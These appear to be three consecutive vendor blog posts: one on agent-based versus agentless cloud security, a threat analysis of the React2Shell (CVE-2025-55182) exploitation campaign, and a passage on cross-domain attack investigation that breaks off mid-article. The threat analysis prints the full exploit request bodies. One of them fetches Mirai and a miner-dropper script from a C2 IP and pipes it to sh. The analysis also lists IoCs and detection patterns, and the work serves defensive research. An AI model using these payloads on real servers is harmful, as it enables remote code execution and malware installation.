January 13, 2025

Agent vs. Agentless Cloud Security: Why Deployment Methods Matter

Cloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security

The rapid adoption of cloud technologies has brought significant security challenges for organizations of all sizes. According to recent studies, over 70% of enterprises now operate in hybrid or multi-cloud environments, with 93% employing a multi-cloud strategy[1]. This complexity requires robust security tools, but opinions vary on the best deployment method—agent-based, agentless, or a combination of both.

Agent-based and agentless cloud security approaches offer distinct benefits and limitations, and organizations often make deployment choices based on the function of the specific assets covered, the types of data stored, and their cloud architecture, such as hybrid or multi-cloud deployments.

For example, agentless solutions are increasingly favored for their ease of deployment and ability to provide broad visibility across dynamic cloud environments. These are especially useful for DevOps teams, with 64% of organizations citing faster deployment as a key reason for adopting agentless tools[2].

On the other hand, agent-based solutions remain the preferred choice for environments requiring deep monitoring and granular control, such as securing sensitive high-value workloads in industries like finance and healthcare. In fact, over 50% of enterprises with critical infrastructure report relying on agent-based solutions for their advanced protection capabilities[3].

As the debate continues, many organizations are turning to combined approaches, leveraging the strengths of both agent-based and agentless tools to address the full spectrum of their security needs for comprehensive coverage. Understanding the capabilities and limitations of these methods is critical to building an effective cloud security strategy that adapts to evolving threats and complex infrastructures.

Agent-based cloud security

Agent-based security solutions involve deploying software agents on each device or system that needs protection. They are great choices when you need in-depth monitoring and protection capabilities, and are ideal for organizations that require deep security controls and real-time active response, particularly in hybrid and on-premises environments.

Key advantages include:

1. Real-time monitoring and protection: Agents detect and block threats like malware, ransomware, and anomalous behaviors in real time, providing ongoing protection and enforcing compliance by continuously monitoring workload activities. Agents also enable full control over workloads for active response, such as blocking IP addresses, killing processes, disabling accounts, and isolating infected systems from the network to stop lateral movement.

2. Deep visibility for hybrid environments: Agent-based approaches allow for full visibility across on-premises, hybrid, and multi-cloud environments by deploying agents on physical and virtual machines. Agents offer detailed insights into system behavior, including processes, files, memory, network connections, and more, detecting subtle anomalies that might indicate security threats. Host-based monitoring tracks vulnerabilities at the system and application level, including unpatched software, rogue processes, and unauthorized network activity.

3. Comprehensive coverage: Agents are highly effective in hybrid environments (cloud and on-premises), as they can be installed on both physical and virtual machines. Each agent functions independently on its host device, which is especially helpful for endpoints that operate without constant network connectivity.

Challenges:

1. Resource-intensive: Agents can consume CPU, memory, and network resources, which may affect performance, especially in environments with large numbers of workloads or ephemeral resources.

2. Challenging in dynamic environments: Managing hundreds or thousands of agents in highly dynamic or ephemeral environments (e.g., containers, serverless functions) can be complex and labor-intensive.

3. Slower deployment: Requires agent installation on each workload or instance, which can be time-consuming, particularly in large or complex environments.  

Agentless cloud security

Agentless security does not require software agents to be installed on each device. Instead, it uses cloud infrastructure and APIs to perform security checks. Agentless solutions are highly scalable, have minimal impact on performance, and are ideal for cloud-native, highly dynamic environments such as serverless and containerized workloads. These solutions are great choices for cloud-native and multi-cloud environments where rapid deployment, scalability, and minimal performance impact are critical, and where response actions can be handled through external tools or manual processes.

Key advantages include:

1. Scalability and ease of deployment: Because agentless security doesn’t require installation on each individual device, it is much easier to deploy and can quickly scale across a vast number of cloud assets. This approach is ideal for environments where resources are frequently created and destroyed (e.g., serverless, containerized workloads), as there is no need for agent installation or maintenance.

2. Reduced system overhead: Without the need to run local agents, agentless security minimizes the impact on system performance. This is crucial in high-performance environments.

3. Broad visibility: Agentless security connects via API to cloud service providers, offering near-instant visibility and threat detection. It provides a comprehensive view of your cloud environment, making it easier to manage and secure large and complex infrastructures.

Challenges

1. Infrastructure-level monitoring: Agentless solutions rely on cloud service provider logs and API calls, meaning that detection might not be as immediate as with agent-based solutions. They collect configuration data and logs, focusing on infrastructure misconfigurations, identity risks, exposed resources, and network traffic, but lack visibility into detailed, system-level information such as running processes and host-level vulnerabilities.

2. Cloud-focused: Primarily for cloud environments, although some tools may integrate with on-premises systems through API-based data gathering. For organizations with hybrid cloud environments, this approach fragments visibility and security, leading to blind spots and increasing security risk.

3. Passive remediation: Typically provides alerts and recommendations, but lacks deep control over workloads, requiring manual intervention or orchestration tools (e.g., SOAR platforms) to execute responses. Some agentless tools trigger automated responses via cloud provider APIs (e.g., revoking permissions, adjusting security groups), but with limited scope.
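To make the response limitations concrete, the following is a minimal sketch, assuming an AWS environment and suitably scoped credentials, of the kind of narrow API-driven remediation an agentless tool might trigger: revoking an overly permissive security group rule with boto3. The security group ID and the rule are hypothetical, and this is illustrative only, not the implementation of any particular product.

# Illustrative only: revoke a 0.0.0.0/0 SSH ingress rule via the AWS API.
# Assumes boto3 is installed and AWS credentials are configured; the group ID is hypothetical.
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

def revoke_open_ssh(security_group_id: str) -> None:
    """Remove a world-open SSH ingress rule from the given security group."""
    ec2.revoke_security_group_ingress(
        GroupId=security_group_id,
        IpPermissions=[{
            "IpProtocol": "tcp",
            "FromPort": 22,
            "ToPort": 22,
            "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
        }],
    )

revoke_open_ssh("sg-0123456789abcdef0")  # hypothetical security group ID

Note that the action stays at the cloud control plane: the API call adjusts configuration, but it cannot, for instance, kill a process on the affected instance, which is where agent-based controls come in.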

Combined agent-based and agentless approaches

A combined approach leverages the strengths of both agent-based and agentless security. This hybrid strategy helps security teams achieve comprehensive coverage by:

  • Using agent-based solutions for deep, real-time protection and detailed monitoring of critical systems or sensitive workloads.
  • Employing agentless solutions for fast deployment, broader visibility, and easier scalability across all cloud assets, which is particularly useful in dynamic cloud environments where workloads frequently change.

The combined approach has distinct practical applications. For example, imagine a financial services company that deals with sensitive transactions. Its security team might use agent-based security for critical databases to ensure stringent protections are in place. Meanwhile, agentless solutions could be ideal for less critical, transient workloads in the cloud, where rapid scalability and minimal performance impact are priorities. Because the company spans different data types and infrastructures, the combined approach serves it best.

Best of both worlds: The benefits of a combined approach

The combined approach not only maximizes security efficacy but also aligns with diverse operational needs. This means that all parts of the cloud environment are secured according to their risk profile and functional requirements. Agent-based deployment provides in-depth monitoring and active protection against threats, suitable for environments requiring tight security controls, such as financial services or healthcare data processing systems. Agentless deployment complements agents by offering broader visibility and easier scalability across diverse and dynamic cloud environments, ideal for rapidly changing cloud resources.

There are three major benefits from combining agent-based and agentless approaches.

1. Building a holistic security posture: By integrating both agent-based and agentless technologies, organizations can ensure that all parts of their cloud environments are covered—from persistent, high-risk endpoints to transient cloud resources. This comprehensive coverage is crucial for detecting and responding to threats promptly and effectively.

2. Reducing overhead while boosting scalability: Agentless systems require no software installation on each device, reducing overhead and eliminating the need to update and maintain agents on a large number of endpoints. This makes it easier to scale security as the organization grows or as the cloud environment changes.

3. Applying targeted protection where needed: Agent-based solutions can be deployed on selected assets that handle sensitive information or are critical to business operations, thus providing focused protection without incurring the costs and complexity of universal deployment.

Use cases for a combined approach

A combined approach gives security teams the flexibility to deploy agent-based and agentless solutions based on the specific security requirements of different assets and environments. As a result, organizations can optimize their security expenditures and operational efforts, allowing for greater adaptability in cloud security use cases.

Let’s take a look at how this could practically play out. In the combined approach, agent-based security can perform the following:

1. Deep monitoring and real-time protection:

  • Workload threat detection: Agent-based solutions monitor individual workloads for suspicious activity, such as unauthorized file changes or unusual resource usage, providing high granularity for detecting threats within critical cloud applications.
  • Behavioral analysis of applications: By deploying agents on virtual machines or containers, organizations can monitor behavior patterns and flag anomalies indicative of insider threats, lateral movement, or Advanced Persistent Threats (APTs).
  • Protecting high-sensitivity environments: Agents provide continuous monitoring and advanced threat protection for environments processing sensitive data, such as payment processing systems or healthcare records, leveraging capabilities like memory protection and file integrity monitoring (a simple sketch of the latter follows this list).

2. Cloud asset protection:

  • Securing critical infrastructure: Agent-based deployments are ideal for assets like databases or storage systems that require real-time defense against exploits and ransomware.
  • Advanced packet inspection: For high-value assets, agents offer deep packet inspection and in-depth logging to detect stealthy attacks such as data exfiltration.
  • Customizable threat response: Agents allow for tailored security rules and automated responses at the workload level, such as shutting down compromised instances or quarantining infected files.
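As a toy illustration of the file integrity monitoring capability mentioned above, the sketch below hashes a few watched files and alerts when their contents change. The paths and polling interval are arbitrary examples; production agents typically hook the operating system rather than poll, and this is not a description of any vendor's agent.

# Toy file integrity monitoring loop, illustrating a host-level check an agent can run.
# Watched paths and the polling interval are arbitrary examples.
import hashlib
import time
from pathlib import Path

WATCHED = [Path("/etc/passwd"), Path("/etc/ssh/sshd_config")]  # example paths

def digest(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

baseline = {p: digest(p) for p in WATCHED if p.exists()}

while True:
    for path, known in baseline.items():
        current = digest(path) if path.exists() else "<missing>"
        if current != known:
            print(f"ALERT: {path} changed (was {known[:12]}, now {current[:12]})")
            baseline[path] = current  # re-baseline after alerting
    time.sleep(30)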

At the same time, agentless cloud security provides complementary benefits such as:

1. Broad visibility and compliance:

  • Asset discovery and management: Agentless systems can quickly scan the entire cloud environment to identify and inventory all assets, a crucial capability for maintaining compliance with regulations like GDPR or HIPAA, which require up-to-date records of data locations and usage.
  • Regulatory compliance auditing and configuration management: Quickly identify gaps in compliance frameworks like PCI DSS or SOC 2 by scanning configurations, permissions, and audit trails without installing agents. Using APIs to check configurations across cloud services ensures that all instances comply with organizational and regulatory standards, an essential aspect for maintaining security hygiene and compliance.
  • Shadow IT detection: Detect and map unauthorized cloud services or assets that are spun up without security oversight, ensuring full inventory coverage.

2. Rapid environmental assessment:

  • Vulnerability assessment of new deployments: In environments where new code is frequently deployed, agentless security can quickly assess new instances, containers, or workloads in CI/CD pipelines for vulnerabilities and misconfigurations, enabling secure deployments at DevOps speed.
  • Misconfiguration alerts: Detect and alert on common cloud configuration issues, such as exposed storage buckets or overly permissive IAM roles, across cloud providers like AWS, Azure, and GCP (a minimal example follows this list).
  • Policy enforcement: Validate that new resources adhere to established security baselines and organizational policies, preventing security drift during rapid cloud scaling.
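As one hedged illustration of the API-driven checks described above, the sketch below uses boto3 to inventory S3 buckets and flag any that lack a full public access block. It assumes read-only AWS credentials and deliberately ignores region handling and other nuances; it shows the general pattern, not a complete scanner.

# Illustrative agentless check: list S3 buckets and flag those without a full public access block.
# Assumes boto3 is installed and read-only AWS credentials are configured.
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")

for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    try:
        conf = s3.get_public_access_block(Bucket=name)["PublicAccessBlockConfiguration"]
        exposed = not all(conf.values())  # any of the four settings left off counts as exposure
    except ClientError:
        exposed = True  # no public access block configured at all
    if exposed:
        print(f"Possible exposure: bucket '{name}' lacks a full public access block")

Because everything happens through the provider's API, the same pattern scales across accounts and regions without touching the workloads themselves.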

Combining agent-based and agentless approaches in cloud security not only maximizes the protective capabilities, but also offers flexibility, efficiency, and comprehensive coverage tailored to the diverse and evolving needs of modern cloud environments. This integrated strategy ensures that organizations can protect their assets more effectively while also adapting quickly to new threats and regulatory requirements.

Darktrace offers complementary and flexible deployment options for holistic cloud security

Powered by multilayered AI, Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that is agentless by default, with optional lightweight, host-based server agents for enhanced real-time actioning and deep inspection. As such, it can deploy in cloud environments in minutes and provide unified visibility and security across hybrid, multi-cloud environments.

With any deployment method, Darktrace supports multi-tenant, hybrid, and serverless cloud environments. Its Self-Learning AI learns the normal behavior across architectures, assets, and users to identify unusual activity that may indicate a threat. With this approach, Darktrace / CLOUD quickly disarms threats, whether they are known, unknown, or completely novel. It then accelerates the investigation process and responds to threats at machine speed.

Learn more about how Darktrace / CLOUD secures multi and hybrid cloud environments in the Solution Brief.

References:

1. Flexera 2023 State of the Cloud Report

2. ESG Research 2023 Report on Cloud-Native Security

3. Gartner, Market Guide for Cloud Workload Protection Platforms, 2023

December 11, 2025

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within Hours


What is React2Shell?

CVE-2025-55182, also known as React2Shell, is a vulnerability in React Server Components that allows an unauthenticated attacker to gain remote code execution with a single request. The severity of this vulnerability and its ease of exploitation have led threat actors to exploit it opportunistically within a matter of days of its public disclosure.

Darktrace security researchers rapidly deployed a new honeypot using the Cloudypots system, allowing for the monitoring of exploitation of the vulnerability in the wild.

Cloudypots is a system that enables virtual instances of vulnerable applications to be deployed in the cloud and monitored for attack. This approach allows Darktrace to deploy high-interaction, realistic honeypots that appear to attackers as genuine deployments of vulnerable software.

This blog will explore one such campaign, nicknamed “Nuts & Bolts” based on the naming used in payloads.

Analysis of the React2Shell exploit

The React2Shell exploit relies on an insecure deserialization vulnerability within React Server Components’ “Flight” protocol. This protocol uses a custom serialization scheme that security researchers discovered could be abused to run arbitrary JavaScript by crafting the serialized data in a specific way. This is possible because the framework did not perform proper type checking, allowing an attacker to reference types that can be abused to craft a chain that resolves to an anonymous function, and then invoke it with the desired JavaScript as a promise chain.

This code execution can then be used to load the ‘child_process’ node module and execute any command on the target server.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day [1]. Within 30 hours of the patch, a publicly available proof of concept emerged that could be used to exploit any vulnerable server. This rapid timeline left many servers remaining unpatched by the time attackers began actively exploiting the vulnerability.

Initial access

The threat actor behind the “Nuts & Bolts” campaign uses a spreader server with IP 95.214.52[.]170 to infect victims. The IP appears to be located in Poland and is associated with a hosting provider known as MEVSPACE. The spreader is highly aggressive, launching exploitation attempts roughly every hour.

When scanning, the spreader primarily targets port 3000, which is the default port for a Next.js server in a default or development configuration. It is possible the attacker is avoiding ports 80 and 443, as these are more likely to sit behind reverse proxies or WAFs, which could disrupt exploitation attempts.

When the spreader finds a new host with port 3000 open, it begins by testing if it is vulnerable to React2Shell by sending a crafted request to run the ‘whoami’ command and store the output in an error digest that is returned to the attacker.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(whoami)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

The above snippet is the core part of the crafted request that performs the execution. This allows the attacker to confirm that the server is vulnerable and fetch the user account under which the NEXT.js process is running, which is useful information for determining if a target is worth attacking.

From here, the attacker then sends an additional request to run the actual payload on the victim server.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;(busybox wget -O x86 hxxp://89[.]144.31.18/nuts/x86%7C%7Ccurl -s -o x86 hxxp://89[.]144.31.18/nuts/x86 );chmod 777 x86;./x86 reactOnMynuts;(busybox wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||curl -s hxxp://89[.]144.31.18/nuts/bolts)%7Csh)&',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

This snippet attempts to download several payloads into the /dev directory using wget (or curl if wget fails) and execute them. The x86 binary is a Mirai variant that does not appear to have any major alterations from standard Mirai. The ‘nuts/bolts’ endpoint returns a bash script, which is then executed. The script includes several log statements throughout its execution to provide visibility into which parts ran successfully. Similar to the ‘whoami’ request, the output is placed in an error digest for the attacker to review.

In this case, the command-and-control (C2) IP, 89[.]144.31.18, is hosted on a different server operated by a German hosting provider named myPrepaidServer, which offers virtual private server (VPS) services and accepts cryptocurrency payments [2].  

Figure 1: Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.

Nuts & Bolts script

This script’s primary purpose is to prepare the box for a cryptocurrency miner.

The script starts by attempting to terminate any competing cryptocurrency miner processes, using ‘pkill’ to match on specific names. It will check for and terminate:

  • xmrig
  • softirq (this also matches a system process, which it will fail to kill on each invocation)
  • watcher
  • /tmp/a.sh
  • health.sh

Following this, the script checks for a process named “fghgf”. If it is not running, it will retrieve hxxp://89[.]144.31.18/nuts/lc and write it to /dev/ijnegrrinje.json, as well as retrieving hxxp://89[.]144.31.18/nuts/x and writing it to /dev/fghgf. The script then executes /dev/fghgf -c /dev/ijnegrrinje.json -B in the background; this binary is an XMRig miner.

Figure 2: The XMRig deployment script.

The miner is configured to connect to two private pools at 37[.]114.37.94 and 37[.]114.37.82, using “poop” as both the username and password. The use of a private pool conceals the associated wallet address. From here, a short bash script is dropped to /dev/stink.sh. This script continuously crawls all running processes on the system and reads their /proc/pid/exe path, which points to the original executable that was run. The ‘strings’ utility is run to output all valid ASCII strings found within the data, and the script checks whether the output contains “xmrig”, “rondo” or “UPX 5”. If so, it sends a SIGKILL to the process to terminate it.

Additionally, it will run ‘ls -l’ on the exe path in case it is symlinked to a specific path or has been deleted. If the output contains any of the following strings, the script sends a SIGKILL to terminate the program (a defensive analogue of this check is sketched after Figure 3):

  • (deleted) - Indicates that the original executable was deleted from the disk, a common tactic used by malware to evade detection.
  • xmrig
  • hash
  • watcher
  • /dev/a
  • softirq
  • rondo
  • UPX 5.02
Figure 3: The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.
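For defenders, the same /proc inspection trick can be turned around to hunt for hidden miners. Below is a minimal, illustrative Python sketch, not taken from the attacker's script, that walks /proc on a Linux host and flags processes whose backing executable has been deleted or whose binary contains the miner-related strings mentioned above; the indicator list and read size are assumptions for the example.

# Defensive analogue of the killer loop described above: walk /proc and flag processes
# whose backing executable was deleted or whose binary contains miner-related strings.
# Run as root on Linux for full visibility; indicators are illustrative examples.
import os

INDICATORS = [b"xmrig", b"rondo", b"UPX 5"]

for pid in filter(str.isdigit, os.listdir("/proc")):
    exe_link = f"/proc/{pid}/exe"
    try:
        target = os.readlink(exe_link)
    except OSError:
        continue  # kernel threads or insufficient permissions
    if target.endswith(" (deleted)"):
        print(f"PID {pid}: backing executable deleted from disk ({target})")
        continue
    try:
        with open(exe_link, "rb") as fh:
            data = fh.read(4 * 1024 * 1024)  # first 4 MiB is enough for a quick string sweep
    except OSError:
        continue
    if any(indicator in data for indicator in INDICATORS):
        print(f"PID {pid}: suspicious strings found in {target}")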

Darktrace observations in customer environments  

Following the public disclosure of CVE-2025-55182 on December 3, Darktrace observed multiple exploitation attempts across customer environments beginning around December 4. Darktrace triage identified a series of consistent indicators of compromise (IoCs). By consolidating indicators across multiple deployments and repeat infrastructure clusters, Darktrace identified a consistent kill chain involving shell-script downloads and HTTP beaconing.

In one example, on December 5, Darktrace observed external connections to malicious IoC endpoints (172.245.5[.]61:38085, 5.255.121[.]141, 193.34.213[.]15), followed by additional connections to other potentially malicious endpoints. These appeared related to the IoCs detailed above, as one suspicious IP address shared the same ASN. After this suspicious external connectivity, Darktrace observed cryptomining-related activity. A few hours later, the device initiated potential lateral movement activity, attempting SMB and RDP sessions with other internal devices on the network. This chain of events suggests the activity is related to the malicious campaign exploiting the React2Shell vulnerability.

Generally, outbound HTTP traffic was observed to ports in the range of 3000–3011, most notably port 3001. Requests frequently originated from scripted tools, with user agents such as curl/7.76.1, curl/8.5.0, Wget/1.21.4, and other generic HTTP signatures. The URIs associated with these requests included paths like /nuts/x86 and /n2/x86, as well as long, randomized shell script names such as /gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh. In some cases, parameterized loaders were observed, using query strings like: /?h=<ip>&p=<port>&t=<proto>&a=l64&stage=true.  
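As a rough, hedged illustration of how these traits could be used for triage against HTTP or proxy logs, the sketch below flags records that combine the observed port range with scripted user agents or the URI patterns described above. The record schema and field names are assumptions for the example and do not represent Darktrace's detection logic.

# Rough triage sketch: flag HTTP log records matching the traits described above.
# The record schema ('dest_port', 'user_agent', 'uri') is an assumption for this example.
import re

SUSPECT_PORTS = set(range(3000, 3012))  # ports 3000-3011, as observed
SUSPECT_AGENTS = re.compile(r"^(curl|wget)/", re.IGNORECASE)
SUSPECT_URIS = re.compile(r"^/(nuts|n2)/|^/[a-z_]{20,}\.sh$|[?&]stage=true")

def is_suspicious(record: dict) -> bool:
    return (
        record.get("dest_port") in SUSPECT_PORTS
        and (
            SUSPECT_AGENTS.match(record.get("user_agent", "")) is not None
            or SUSPECT_URIS.search(record.get("uri", "")) is not None
        )
    )

# Example usage against a single parsed record:
print(is_suspicious({"dest_port": 3001, "user_agent": "curl/8.5.0", "uri": "/nuts/x86"}))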

Infrastructure analysis revealed repeated callbacks to IP-only hosts linked to ASN AS200593 (Prospero OOO), a well-known “bulletproof” hosting provider often utilized by cyber criminals [3], including addresses such as 193.24.123[.]68:3001 and 91.215.85[.]42:3000, alongside other nodes hosting payloads and staging content.

Darktrace model coverage

Darktrace model coverage consistently highlighted behaviors indicative of exploitation. Among the most frequent detections were anomalous server activity on new, non-standard ports and HTTP requests posted to IP addresses without hostnames, often using uncommon application protocols. Models also flagged the appearance of new user agents such as curl and wget originating from internet-facing systems, representing an unusual deviation from baseline behavior.  

Additionally, observed activity included the download of scripts and executable files from rare external sources, with Darktrace’s Autonomous Response capability intervening to block suspicious transfers, when enabled. Beaconing patterns were another strong signal, with detections for HTTP beaconing to new or rare IP addresses, sustained SSL or HTTP increases, and long-running compromise indicators such as “Beacon for 4 Days” and “Slow Beaconing.”

Conclusion

While this opportunistic campaign exploiting the React2Shell vulnerability is not particularly sophisticated, it demonstrates that attackers can rapidly prototype new methods to take advantage of novel vulnerabilities before widespread patching occurs. With a time to infection of only two minutes from the initial deployment of the honeypot, this serves as a clear reminder that applying patches as soon as they are released is paramount.

Credit to Nathaniel Bill (Malware Research Engineer), George Kim (Analyst Consulting Lead – AMS), Calum Hall (Technical Content Researcher), Tara Gould (Malware Research Lead), and Signe Zaharka (Principal Cyber Analyst).

Edited by Ryan Traill (Analyst Content Lead)

Appendices

IoCs

Spreader IP - 95[.]214.52.170

C2 IP - 89[.]144.31.18

Mirai hash - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb

Xmrig hash - aa6e0f4939135feed4c771e4e4e9c22b6cedceb437628c70a85aeb6f1fe728fa

Config hash - 318320a09de5778af0bf3e4853d270fd2d390e176822dec51e0545e038232666

Monero pool 1 - 37[.]114.37.94

Monero pool 2 - 37[.]114.37.82

References  

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182

[2] https://myprepaid-server.com/

[3] https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab

Darktrace Model Coverage

Anomalous Connection::Application Protocol on Uncommon Port

Anomalous Connection::New User Agent to IP Without Hostname

Anomalous Connection::Posting HTTP to IP Without Hostname

Anomalous File::Script and EXE from Rare External

Anomalous File::Script from Rare External Location

Anomalous Server Activity::New User Agent from Internet Facing System

Anomalous Server Activity::Rare External from Server

Antigena::Network::External Threat::Antigena Suspicious File Block

Antigena::Network::External Threat::Antigena Watched Domain Block

Compromise::Beacon for 4 Days

Compromise::Beacon to Young Endpoint

Compromise::Beaconing Activity To External Rare

Compromise::High Volume of Connections with Beacon Score

Compromise::HTTP Beaconing to New IP

Compromise::HTTP Beaconing to Rare Destination

Compromise::Large Number of Suspicious Failed Connections

Compromise::Slow Beaconing Activity To External Rare

Compromise::Sustained SSL or HTTP Increase

Device::New User Agent

Device::Threat Indicator

About the author
Nathaniel Bill
Malware Research Engineer

December 8, 2025

Simplifying Cross Domain Investigations


Cross-domain gaps mean cross-domain attacks  

Organizations are built on increasingly complex digital estates. Nowadays, the average IT ecosystem spans a large web of interconnected domains like identity, network, cloud, and email.

While these domain-specific technologies may boost business efficiency and scalability, they also provide blind spots where attackers can shelter undetected. Threat actors can slip past defenses because security teams often use different detection tools in each realm of their digital infrastructure. Adversaries will purposefully execute different stages of an attack across different domains, ensuring no single tool picks up too many traces of their malicious activity. Identifying and investigating this type of threat, known as a cross-domain attack, requires mastery in event correlation.  

For example, one isolated network scan detected on your network may seem harmless at first glance. Only when it is stitched together with a rare O365 login, a new email rule and anomalous remote connections to an S3 bucket in AWS does it begin to manifest as an actual intrusion.  

However, there are a whole host of other challenges that arise with detecting this type of attack. Accessing those alerts in the respective on-premise network, SaaS and IaaS environments, understanding them and identifying which ones are related to each other takes significant experience, skill and time. And time favours no one but the threat actor.  

Figure 1: Anatomy of a cross domain attack

Diverse domains and empty grocery shelves

In April 2025, the UK faced a throwback to pandemic-era shortages when the supermarket giant Marks & Spencer (M&S) was crippled by a cyberattack, leaving empty shelves across its stores and massive disruptions to its online service.  

The threat actors, a group called Scattered Spider, exploited multiple layers of the organization’s digital infrastructure. Notably, the group were able to bypass the perimeter not by exploiting a technical vulnerability, but by exploiting an identity. They used social engineering tactics to impersonate an M&S employee and successfully request a password reset.

Once authenticated on the network, they accessed the Windows domain controller and exfiltrated the NTDS.dit file – a critical file containing hashed passwords for all users in the domain. After cracking those hashes offline, they returned to the network with escalated privileges and set their sights on the M&S cloud infrastructure. They then launched the encryption payload on the company’s ESXi virtual machines.

To wrap up, the threat actors used a compromised employee’s email account to send an “abuse-filled” email to the M&S CEO, bragging about the hack and demanding payment. This was possibly more of a psychological attack on the CEO than a technically integral part of the cyber kill chain. However, it revealed yet another one of M&S’s domains had been compromised.  

In summary, the group’s attack spanned four different domains:

  • Identity: Social engineering user impersonation
  • Network: Exfiltration of NTDS.dit file
  • Cloud: Ransomware deployed on ESXi VMs
  • Email: Compromise of user account to contact the CEO

Adept at exploiting nuance

This year alone, several high-profile cyber-attacks have been attributed to the same group, Scattered Spider, including the hacks on Victoria’s Secret, Adidas, Hawaiian Airlines, WestJet, the Co-op and Harrods. It begs the question, what has made this group so successful?

In the M&S attack, they showcased their advanced proficiency in social engineering, which they use to bypass identity controls and gain initial access. They demonstrated deep knowledge of cloud environments by deploying ransomware onto virtualised infrastructure. However, this does not exemplify a cookie-cutter template of attack methods that brings them success every time.

According to CISA, Scattered Spider typically use a remarkable variety of TTPs (tactics, techniques and procedures) across multiple domains to carry out their campaigns. From leveraging legitimate remote access tools in the network, to manipulating AWS EC2 cloud instances or spoofing email domains, the list of TTPs used by the group is eye-wateringly long. Additionally, the group reportedly evades detection by “frequently modifying their TTPs”.  

If only they had better intentions. Any security director would be proud of a red team who not only has this depth and breadth of domain-centric knowledge but is also consistently upskilling.  

Yet, staying ahead of adversaries who seamlessly move across domains and fluently exploit every system they encounter is just one of many hurdles security teams face when investigating cross-domain attacks.  

Resource-heavy investigations

There was a significant delay in time to detection of the M&S intrusion. News outlet BleepingComputer reported that attackers infiltrated the M&S network as early as February 2025. They maintained persistence for weeks before launching the attack in late April 2025, indicating that early signs of compromise were missed or not correlated across domains.

While it’s unclear exactly why M&S missed the initial intrusion, one can speculate about the unique challenges investigating cross-domain attacks present.  

Challenges of cross-domain investigation

First and foremost, correlation work is arduous because the string of malicious behaviour doesn’t always stem from the same device.  

A hypothetical attack could begin with an O365 credential creating a new email rule. Weeks later, that same credential authenticates anomalously on two different devices. One device downloads an .exe file from a strange website, while the other starts beaconing every minute to a rare external IP address that no one else in the organisation has ever connected to. A month later, a third device downloads 1.3 GiB of data from a recently spun up S3 bucket and gradually transfers a similar amount of data to that same rare IP.

Amid a sea of alerts and false positives, connecting the dots of a malicious attack like this takes time and meticulous correlation. Factor in the nuanced telemetry data related to each domain and things get even more complex.  
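To make the correlation problem concrete, here is a deliberately naive Python sketch that groups alerts sharing an entity (a credential or device) within a time window and surfaces only the chains that span more than one domain. The alert fields, values, and window are hypothetical, and real correlation engines weigh far more signals; the point is simply how scattered events only become an incident once they are stitched together.

# Naive cross-domain correlation: cluster alerts that share an entity within a time window.
# Alert records and the window are hypothetical examples.
from collections import defaultdict
from datetime import datetime, timedelta

alerts = [
    {"time": datetime(2025, 3, 1, 9, 0), "domain": "email", "entity": "user@corp", "summary": "new inbox rule"},
    {"time": datetime(2025, 3, 20, 2, 15), "domain": "identity", "entity": "user@corp", "summary": "anomalous O365 login"},
    {"time": datetime(2025, 3, 20, 2, 40), "domain": "network", "entity": "user@corp", "summary": "beaconing to rare IP"},
]

WINDOW = timedelta(days=30)

def correlate(alerts):
    """Return (entity, cluster) pairs, splitting a cluster when the gap exceeds WINDOW."""
    by_entity = defaultdict(list)
    for alert in sorted(alerts, key=lambda a: a["time"]):
        by_entity[alert["entity"]].append(alert)
    incidents = []
    for entity, items in by_entity.items():
        cluster = [items[0]]
        for alert in items[1:]:
            if alert["time"] - cluster[-1]["time"] <= WINDOW:
                cluster.append(alert)
            else:
                incidents.append((entity, cluster))
                cluster = [alert]
        incidents.append((entity, cluster))
    return incidents

for entity, cluster in correlate(alerts):
    domains = {a["domain"] for a in cluster}
    if len(domains) > 1:  # only surface genuinely cross-domain chains
        print(entity, "->", [a["summary"] for a in cluster])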

An analyst who specialises in network security may not understand the unique logging formats or API calls in the cloud environment. Perhaps they are proficient in protecting the Windows Active Directory but are unfamiliar with cloud IAM.  

Cloud is also an inherently more difficult domain to investigate. With 89% of organizations now operating in multi-cloud environments, time must be spent collecting logs, snapshots and access records. Coupled with the threat of an ephemeral asset disappearing, the risk of missing a threat is high. These are some of the reasons why research shows that 65% of organisations spend 3-5 extra days investigating cloud incidents.

Helpdesk teams handling user requests over the phone require a different set of skills altogether. Imagine a threat actor posing as an employee and articulately requesting an urgent password reset or a temporary MFA deactivation. The junior Helpdesk agent— unfamiliar with the exception criteria, eager to help and feeling pressure from the persuasive manipulator at the end of the phoneline—could easily fall victim to this type of social engineering.  

Empowering analysts through intelligent automation

Even the most skilled analysts can’t manually piece together every strand of malicious activity stretching across domains. But skill alone isn’t enough. The biggest hurdle in investigating these attacks often comes down to whether the team have the time, context, and connected visibility needed to see the full picture.

Many organizations attempt to bridge the gap by stitching together a patchwork of security tools. One platform for email, another for endpoint, another for cloud, and so on. But this fragmentation reinforces the very silos that cross-domain attacks exploit. Logs must be exported, normalized, and parsed across tools, a process that is not only error-prone but slow. By the time indicators are correlated, the intrusion has often already deepened.

